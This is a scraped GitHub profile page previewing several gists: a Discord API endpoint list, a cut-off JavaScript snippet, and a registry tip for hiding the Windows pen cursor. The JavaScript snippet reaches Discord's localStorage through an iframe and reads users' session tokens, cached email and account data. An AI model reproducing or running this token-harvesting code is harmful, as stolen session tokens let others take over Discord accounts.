Skip to content

Instantly share code, notes, and snippets.

View Iemand005's full-sized avatar
🏠
Working from home

Lasse Lauwerys Iemand005

🏠
Working from home
View GitHub Profile
@hackermondev
hackermondev / api endpoints.md
Last active November 26, 2025 13:34
discord api endpoints

List of every single Discord API endpoint used on the client

Last updated: July 22, 2025

https://discord.com/api/v9

Endpoint Name path
const localStorage = document.body.appendChild(document.createElement("iframe")).contentWindow.localStorage;
const tokens = JSON.parse(localStorage.tokens);
const email = localStorage.email_cache.slice(1, -1);
const users = JSON.parse(localStorage.MultiAccountStore)._state.users;
for (const [userId, token] of Object.entries(tokens)) {
/* console.log(`Discord ID: ${userId}, Token: ${token}`); */
let avatar = "https://discord.com/assets/1f0bfc0865d324c2587920a7d80c609b.png";
@keijiro
keijiro / hide_pen_cursor.md
Last active April 21, 2025 19:40
How to hide pen cursor in Windows 10
  1. Launch regedit.exe
  2. Edit the registry key HKEY_CURRENT_USER\Control Panel\Cursors\PenVisualization, or create a DWORD key if it doesn't exist.
  3. Set the value to 0.
  4. Restart Windows.